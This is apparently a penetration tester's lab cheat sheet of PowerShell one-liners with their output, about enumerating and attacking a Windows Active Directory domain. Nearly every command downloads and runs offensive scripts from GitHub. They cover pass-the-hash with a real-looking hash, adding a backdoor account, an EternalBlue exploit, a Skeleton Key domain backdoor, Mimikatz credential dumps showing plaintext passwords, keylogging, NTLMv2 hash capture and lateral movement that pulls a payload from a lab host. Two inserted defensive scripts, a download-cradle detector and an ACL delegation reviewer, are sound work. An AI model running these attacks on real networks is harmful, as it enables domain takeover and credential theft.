Quick PS wins

The following is a dump from me running PS one-liners in my lab. I wanted to add this page just to show what results should be expected from such commands.

@myexploit2600

———-

See who is connected to a central file server (DC). You can run this as a standard domain user to see the location of other users.

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Get-NetSessions.ps1'); Get-NetSessions -HostName WIN-O9LVH0D7KUN"

sesi10_cname sesi10_username sesi10_time
------------ --------------- -----------
\\192.168.1.11 user9 409
\\192.168.1.10 user6 159
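
Every command on this page uses the same launch pattern (`-nop -exec bypass` plus `IEX` over `Net.WebClient.DownloadString`), which makes it a good detection anchor. The following is an added example, not part of the original post: a hypothetical `Test-DownloadCradle` function that scores command lines taken from process-creation logs, run here on two constructed samples.

```powershell
# Added example (not from the original post): flag PowerShell download cradles
# in process command lines. Feed it CommandLine values from process-creation
# logs (Security 4688 or Sysmon 1); the samples below are constructed.

function Test-DownloadCradle {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$CommandLine
    )
    begin {
        # Each indicator is weak on its own; the combination is the signal.
        $indicators = [ordered]@{
            NoProfile        = '(?i)\s-nop\w*'
            PolicyBypass     = '(?i)\s-e[xp]\w*\s+bypass\b'
            InvokeExpression = '(?i)\b(IEX|Invoke-Expression)\b'
            WebDownload      = '(?i)Net\.WebClient\b.*\.Download(String|File|Data)\s*\('
        }
        # Captures the quoted first argument of the download call.
        $urlPattern = '(?i)\.Download(?:String|File|Data)\s*\(\s*[''"]([^''"]+)[''"]'
    }
    process {
        $hits = @($indicators.Keys | Where-Object { $CommandLine -match $indicators[$_] })
        $url  = if ($CommandLine -match $urlPattern) { $Matches[1] } else { $null }
        $uri  = $url -as [uri]
        [pscustomobject]@{
            # IEX combined with a web download is what defines the cradle.
            IsCradle   = ($hits -contains 'InvokeExpression') -and ($hits -contains 'WebDownload')
            Indicators = $hits -join ', '
            RemoteHost = if ($uri -and $uri.IsAbsoluteUri) { $uri.Host } else { $null }
            Url        = $url
        }
    }
}

# Constructed samples: one cradle in the style used on this page, one benign
# scheduled script that shares only the -NoProfile / Bypass switches.
$samples = @(
    'powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1''); Get-NetUser user2"'
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1'
)
$samples | Test-DownloadCradle | Format-List
```

The command line only shows the URL; with Script Block Logging enabled, event 4104 in the Microsoft-Windows-PowerShell/Operational log also records the script text that `IEX` executed.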

———-

Gets a list of all current users in a specified local group

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/240711712e014f90b9e7d4f7e97f44c36cac65cf/powerview.ps1');Get-NetLocalGroup -HostName LAB22.server1.hacklab.local"

Server : LAB22.server1.hacklab.local
IsGroup : False
AccountName : LAB22/Administrator
Disabled : False
SID : S-1-5-21--711273148-1414552638--1372295448-500

Server : LAB22.server1.hacklab.local
IsGroup : False
AccountName : LAB22/IEUser
Disabled : False
SID : S-1-5-21--711273148-1414552638--1372295448-1000

Server : LAB22.server1.hacklab.local
IsGroup : False
AccountName : LAB22/sshd_server
Disabled : False
SID : S-1-5-21--711273148-1414552638--1372295448-1002

———-

See a user's groups

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetGroup -UserName user1"

SERVER1\Denied RODC Password Replication Group
SERVER1\Domain Admins
SERVER1\Domain Users

———-

Pass the hash (PTH)

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-SMBExec.ps1');Invoke-SMBExec -Target 192.168.1.11 -Domain WORKGROUP -Username IEUser -Hash fc525c9683e8fe067095ba2ddc971889 -Command 'net user SMBExec Winter2017 /add'"

———-

Retrieves all computers from Active Directory, then searches for and returns the members of the Local Admins group

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/Modules/Get-LocAdm.ps1');Get-LocAdm"

———-

Lateral movement

https://raw.githubusercontent.com/EmpireProject/Empire/73358262acc8ed3c34ffc87fa593655295b81434/data/module_source/lateral_movement/Invoke-ExecuteMSBuild.ps1

C:\> powershell.exe -nop -exec bypass
C:\> Import-Module C:\Users\User3\Desktop\Test\Invoke-ExecuteMSBuild.ps1

C:\> Invoke-ExecuteMSBuild -ComputerName 'LAB1.server1.hacklab.local' -Command "IEX (New-Object net.webclient).DownloadString('http://192.168.1.6/payload.txt')"

———-

Any user can run the command below to see local admins

PS C:\Users\user4> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetLocalGroup -ComputerName WIN-O9LVH0D7KUN"

Name Value
---- -----
IsDomain True
Type LocalUser
IsGroup False
AccountName SERVER1\Administrator
ComputerName WIN-O9LVH0D7KUN
SID S-1-5-21-2697380906-1103735541-565548376-500

IsDomain True
Type LocalUser
IsGroup True
AccountName SERVER1\Enterprise Admins
ComputerName WIN-O9LVH0D7KUN

———-

Get the DC names

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetDomainController"

Forest : server1.hacklab.local
CurrentTime : 4/19/2005 12:05:18 PM
HighestCommittedUsn : 118827
OSVersion : Windows Server 2008 R2 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : server1.hacklab.local
IPAddress : 192.168.1.200
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {}
OutboundConnections : {}
Name : WIN-O9LVH0D7KUN.server1.hacklab.local

———-

List all machine names

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-NetComputer -FullData | Get-NameField"

WIN-O9LVH0D7KUN.server1.hacklab.local
Win7-Lab2.server1.hacklab.local
LAB2.server1.hacklab.local
LAB1.server1.hacklab.local
EXCHANGE-2013.server1.hacklab.local

———-

This is cool: ACLs

https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

To create a user without DA but with rights to change passwords: in Active Directory Users and Computers, right-click the domain and select Delegate Control / Next / Add / add the user or group / tick the task to delegate.

Removing Delegated Permissions in AD – https://blog.netwrix.com/2016/10/27/detecting-delegated-permissions-in-active-directory/

In Active Directory Users and Computers, open the View menu and make sure ‘Advanced Features’ is ticked.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-ACLScanner"

The results show any user that has extended rights (think helpdesk).

ObjectDN : CN=user6,CN=Users,DC=server1,DC=hacklab,DC=local
ObjectSID : S-1-5-21-2697380906-1103735541-565548376-1108
IdentitySID : S-1-5-21-2697380906-1103735541-565548376-1108
ActiveDirectoryRights : ExtendedRight
InheritanceType : All
ObjectType : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectType : bf967aba-0de6-11d0-a285-00aa003049e2
ObjectFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType : Allow
IdentityReference : SERVER1\user6
IsInherited : True
InheritanceFlags : ContainerInherit
PropagationFlags : None
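
The ObjectType GUID in the record above, 00299570-246d-11d0-a768-00aa006e0529, is the User-Force-Change-Password (reset password) control access right, and the InheritedObjectType GUID is the user class. The following is an added example for reviewing such delegations, not part of the original post or of PowerView: it parses records in this list layout and names the delegated right; `ConvertFrom-ListText` and `Get-DelegatedRightFinding` are hypothetical names and the RID threshold is a stated assumption.

```powershell
# Added example (not from the original post): triage ACE records printed in the
# "Name : Value" list layout shown above. Function names are hypothetical.

# Control access right GUIDs from the AD schema (rightsGuid values).
$ExtendedRights = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password (reset password)'
    'ab721a53-1e2f-11d0-9819-00aa0040529b' = 'User-Change-Password'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}

function ConvertFrom-ListText {
    param([Parameter(Mandatory)][string]$Text)
    # Records are separated by blank lines; each line is "Name : Value".
    foreach ($block in ($Text -split '\r?\n\s*\r?\n')) {
        $record = [ordered]@{}
        foreach ($line in ($block -split '\r?\n')) {
            if ($line -match '^\s*(\w+)\s*:\s*(.*)$') { $record[$Matches[1]] = $Matches[2].Trim() }
        }
        if ($record.Count -gt 0) { New-Object psobject -Property $record }
    }
}

function Get-DelegatedRightFinding {
    param([Parameter(Mandatory, ValueFromPipeline)]$Ace)
    process {
        if ($Ace.AccessControlType -ne 'Allow') { return }
        if ($Ace.ActiveDirectoryRights -notmatch 'ExtendedRight') { return }
        $guid  = "$($Ace.ObjectType)".ToLower()
        $right = $ExtendedRights[$guid]
        if (-not $right) { $right = "Unmapped right $guid" }
        # Heuristic (assumption): RIDs of 1000 and above are accounts or groups
        # created after domain setup, so a delegation to one needs a named owner.
        $rid = [long](($Ace.IdentitySID -split '-')[-1])
        [pscustomobject]@{
            Principal   = $Ace.IdentityReference
            Target      = $Ace.ObjectDN
            Right       = $right
            Inherited   = ($Ace.IsInherited -eq 'True')
            NeedsReview = ($rid -ge 1000)
        }
    }
}

# Sample input: the lab record printed above, copied as text.
$sample = @'
ObjectDN              : CN=user6,CN=Users,DC=server1,DC=hacklab,DC=local
ObjectSID             : S-1-5-21-2697380906-1103735541-565548376-1108
IdentitySID           : S-1-5-21-2697380906-1103735541-565548376-1108
ActiveDirectoryRights : ExtendedRight
InheritanceType       : All
ObjectType            : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectType   : bf967aba-0de6-11d0-a285-00aa003049e2
ObjectFlags           : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : SERVER1\user6
IsInherited           : True
InheritanceFlags      : ContainerInherit
PropagationFlags      : None
'@

ConvertFrom-ListText -Text $sample | Get-DelegatedRightFinding | Format-List
```

Because the record is inherited (IsInherited is True), the delegation has to be removed on the parent container or domain object where it was set, not on the individual user.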

———-

Searches user object fields for a given word (default *pass*). Default field being searched is ‘description’.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-UserField"

samaccountname description
-------------- -----------
user4 Passw0rd!

———-

Find out when user accounts were last used

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-UserProperty -Properties ssn,lastlogon,location"

name ssn lastlogon location
---- --- --------- --------
Administrator 4/17/2018 11:45:36 AM
Guest 1/1/1601 12:00:00 AM
krbtgt 1/1/1601 12:00:00 AM
user1 4/17/2018 2:06:40 PM
user2 4/17/2018 3:56:01 PM
user3 4/17/2018 12:45:19 PM
user4 4/17/2018 12:42:03 PM

———-

PS equivalent of the net user command

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetUser user2"

adspath : LDAP://CN=user2,CN=Users,DC=server1,DC=hacklab,DC=local
objectsid : S-1-5-21-2697380906-1103735541-565548376-1104
samaccounttype : 805306368
primarygroupid : 513
instancetype : 4
badpasswordtime : 4/16/2018 4:27:31 PM
memberof : CN=Remote Desktop Users,CN=Builtin,DC=server1,DC=hacklab,DC=local
whenchanged : 4/10/2018 12:41:49 PM
objectclass : {top, person, organizationalPerson, user}
useraccountcontrol : 512
countrycode : 0
distinguishedname : CN=user2,CN=Users,DC=server1,DC=hacklab,DC=local
logoncount : 45

———-

Find out if your account has local admin rights


powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-CheckLocalAdminAccess"

ComputerName IsAdmin
------------ -------
localhost True

———-

Find if your account has local admin access on any remote machine

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess"

WIN-O9LVH0D7KUN.server1.hacklab.local
LAB1.server1.hacklab.local

———-

See what's copied in the clipboard

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1');Get-ClipboardContents"
=== Get-ClipboardContents Starting at 10/04/2018:15:43:37:75 ===

=== 10/04/2018:15:43:37:78 ===

this is a test the password is this is the second test

———

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-Keystrokes.ps1');Get-Keystrokes | out-file -Encoding ASCII kerb-Hash1.txt"

PS C:\Users\user1\Desktop> dir

Directory: C:\Users\user1\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 23/03/2018 09:54 CTF_PCAP
-a--- 10/04/2018 15:26 162 kerb-Hash1.txt
-a--- 22/03/2018 16:31 430 Local Area Connection - Shortcut.lnk
-a--- 22/03/2018 12:17 1786 Wireshark.lnk

PS C:\Users\user1\Desktop> type kerb-Hash1.txt

Untitled - Notepad - 10/04/2018:15:25:57:03
t
h
i
s
[SpaceBar]
i
s
[SpaceBar]
t
h
e
[SpaceBar]
s
e
o
n
d
[SpaceBar]
t
e
s
t
[Enter]

———-

MS17-010

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/exploitation/Exploit-EternalBlue.ps1');Invoke-EternalBlue -Target 127.0.0.1 -InitialGrooms 12 -MaxAttempts 12 -Shellcode @(0x90,0x90,0xC3)"

VERBOSE: Connecting to target for activities
VERBOSE: Connection established for exploitation.
VERBOSE: all but last fragment of exploit packet
VERBOSE: Running final exploit packet
VERBOSE: socket error, exploit may fail
VERBOSE: SMB code: 00-00
VERBOSE: Send the payload with the grooms
VERBOSE: Connecting to target for activities
VERBOSE: Connection established for exploitation.
VERBOSE: all but last fragment of exploit packet
VERBOSE: Running final exploit packet
VERBOSE: socket error, exploit may fail
VERBOSE: SMB code: 00-00
VERBOSE: Send the payload with the grooms
VERBOSE: Connecting to target for activities
VERBOSE: Connection established for exploitati

———-

Skeleton Key – Has to be run in a PS session with DA rights. Backdoors every user with mimikatz as the password. This runs in memory, so following a reboot of the DC the shadow password of mimikatz is cleared. The original password is not affected and can be used at the same time.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command misc::skeleton"

Hostname: WIN-O9LVH0D7KUN.server1.hacklab.local / S-1-5-21-2697380906-1103735541-565548376

.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

———-

UserHunter – needs to be local admin on the boxes or DA

Finds machines on the local domain where domain admins are logged into and checks if the current user has local administrator access.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-UserHunter -CheckAccess"

UserDomain : server1.hacklab.local
UserName : Administrator
ComputerName : WIN-O9LVH0D7KUN.server1.hacklab.local
IP : {192.168.1.200, 192.168.56.200}
SessionFrom : [fe80::f86b:aab8:392c:7ddb]
LocalAdmin : False

Multi-threaded user hunting, replaces Invoke-UserHunterThreaded.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-UserHunter -Threads 20"

UserDomain : server1.hacklab.local
UserName : Administrator
ComputerName : WIN-O9LVH0D7KUN.server1.hacklab.local
IP : {192.168.1.200, 192.168.56.200}
SessionFrom : [fe80::f86b:aab8:392c:7ddb]
LocalAdmin :

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-UserHunter -SearchForest"

UserDomain : server1.hacklab.local
UserName : Administrator
ComputerName : WIN-O9LVH0D7KUN.server1.hacklab.local
IP : {192.168.1.200, 192.168.56.200}
SessionFrom : [fe80::f86b:aab8:392c:7ddb]
LocalAdmin :

———-

Search for .xml files

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Find-InterestingFile -Path \\server1.hacklab.local\sysvol\ -Terms .xml"

FullName : \\server1.hacklab.local\sysvol\server1.hacklab.local\Policies\groups.xml
Owner : BUILTIN\Administrators
LastAccessTime : 4/6/2018 1:02:33 PM
LastWriteTime : 4/6/2018 1:02:28 PM
CreationTime : 4/6/2018 1:02:33 PM
Length : 4

———-

Check if you have local admin access on a defined host.

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-CheckLocalAdminAccess -ComputerName 'WIN-O9LVH0D7KUN'"

False

———-

Returns active shares on the defined host

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetShare -ComputerName WIN-O9LVH0D7KUN"

shi1_netname shi1_type shi1_remark

ADMIN$ 2147483648 Remote Admin
C$ 2147483648 Default share
IPC$ 2147483651 Remote IPC
NETLOGON 0 Logon server share
SYSVOL 0 Logon server share

———-

List file servers

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetFileServer"

———-

Return a list of domain admins

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetGroupMember"

GroupDomain : server1.hacklab.local
GroupName : Domain Admins
MemberDomain : server1.hacklab.local
MemberName : AV_Service
MemberSid : S-1-5-21-2697380906-1103735541-565548376-1112
IsGroup : False
MemberDN : CN=AV_Service AV.,CN=Users,DC=server1,DC=hacklab,DC=local

GroupDomain : server1.hacklab.local
GroupName : Domain Admins
MemberDomain : server1.hacklab.local
MemberName : user1
MemberSid : S-1-5-21-2697380906-1103735541-565548376-1103
IsGroup : False
MemberDN : CN=user1,CN=Users,DC=server1,DC=hacklab,DC=local

GroupDomain : server1.hacklab.local
GroupName : Domain Admins
MemberDomain : server1.hacklab.local
MemberName : Administrator
MemberSid : S-1-5-21-2697380906-1103735541-565548376-500
IsGroup : False
MemberDN : CN=Administrator,CN=Users,DC=server1,DC=hacklab,DC=local

———-

Look up net groups

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Get-NetGroup -GroupName *admin*"

Administrators
Schema Admins
Enterprise Admins
Domain Admins
DnsAdmins

———-

Inveigh – Responder for PS

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -FileOutput Y"

Inveigh 1.3.1 started at 2018-04-05T13:29:29
Elevated Privilege Mode = Disabled
Primary IP Address = 192.168.1.10
LLMNR/mDNS/NBNS Spoofer IP Address = 192.168.1.10
WARNING: LLMNR Spoofer Disabled Due To In Use Port 5355
mDNS Spoofer = Disabled
NBNS Spoofer For Types 00,20 = Enabled
NBNS TTL = 165 Seconds
SMB Capture = Disabled
HTTP Capture = Enabled
HTTPS Capture = Disabled
HTTP/HTTPS Authentication = NTLM
WPAD Authentication = NTLM
WPAD NTLM Authentication Ignore List = Firefox
HTTP Reset Delay List = Firefox
HTTP Reset Delay Timeout = 30 Seconds
WPAD Default Response = Enabled
Machine Account Capture = Disabled
Real Time Console Output = Enabled
Real Time File Output = Enabled
Output Directory = C:\Users\User4
WARNING: Run Stop-Inveigh to stop Inveigh
Press any key to stop real time console output
2018-04-05T13:29:35 - HTTP request for received from 192.168.1.11
2018-04-05T13:29:35 - HTTP host header 192.168.1.10 received from 192.168.1.11
2018-04-05T13:29:35 - HTTP user agent received from 192.168.1.11:
Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
2018-04-05T13:29:35 - HTTP NTLMv2 challenge/response captured from 192.168.1.11(IEWIN7):
test::IEWIN7:1F2EA9383A5E38E7:321618C24ABBA7469C6A99F84549F979:010100000000000056A902C2D9CCD301A3C43FF7CF0534A400000000020006004C00410042000100100048004F00530054004E0041004D004500040012006C00610062002E006C006F00630061006C000300240068006F00730074006E0061006D0065002E006C00610062002E006C006F0063006100
6C00050012006C00610062002E006C006F00630061006C000700080056A902C2D9CCD301060004000600000008003000300000000000000000000000003000003E8E3D13332F4B20E85F61CC9B757372FB3FD4EFBE0A96E7F11A2378563630700A001000000000000000000000000000000000000900220048005400540050002F003100390032002E003100360038002E0031002E0
031003000000000000000000000000000

———-

Hunt out MS08-067

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Invoke-FindVulnSystems -Ping"

———-

Find Computer version – PS smb version

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Get-NetComputers"

WIN-O9LVH0D7KUN.server1.hacklab.local
Win7-Lab2.server1.hacklab.local
LAB2.server1.hacklab.local
LAB1.server1.hacklab.local
EXCHANGE-2013.server1.hacklab.local

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Get-NetComputers -OperatingSystem *xp*"

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/misc/powerview.ps1'); Get-NetComputers -OperatingSystem *2008*"

WIN-O9LVH0D7KUN.server1.hacklab.local
EXCHANGE-2013.server1.hacklab.local

———-

Download and Execute BloodHound

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"

———-

Mimikatz – Dump creds from a local machine

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Feb 16 2015 22:17:52)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 15 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 971431 (00000000:000ed2a7)
Session : Interactive from 1
User Name : User1
Domain : SERVER1
SID : S-1-5-21-2697380906-1103735541-565548376-1103
msv :
[00000003] Primary
* Username : user1
* Domain : SERVER1
* NTLM : fc525c9683e8fe067095ba2ddc971889
* SHA1 : e53d7244aa8727f5789b01d8959141960aad5d22
[00010000] CredentialKeys
* NTLM : fc525c9683e8fe067095ba2ddc971889
* SHA1 : e53d7244aa8727f5789b01d8959141960aad5d22
tspkg :
wdigest :
* Username : user1
* Domain : SERVER1
* Password : Passw0rd!

———

See all users logged on to a machine and list their shares

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Invoke-Netview.ps1'); Invoke-Netview "
Running Netview with delay of 0
[+] Domain: server1.hacklab.local
[*] Querying domain server1.hacklab.local for hosts...

[*] Total number of hosts: 4

[+] Domain Controller: WIN-O9LVH0D7KUN.server1.hacklab.local

[+] Server: WIN-O9LVH0D7KUN.server1.hacklab.local
[+] IP: 192.168.1.200 192.168.56.200
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Logged-on - SERVER1\\Administrator
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: ADMIN$ : Remote Admin
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: C$ : Default share
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: IPC$ : Remote IPC
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: NETLOGON : Logon server share
[+] WIN-O9LVH0D7KUN.server1.hacklab.local - Share: SYSVOL : Logon server share

[+] Server: Win7-Lab2.server1.hacklab.local
[+] IP: 192.168.1.6

[+] Server: LAB2.server1.hacklab.local
[+] IP: 192.168.1.5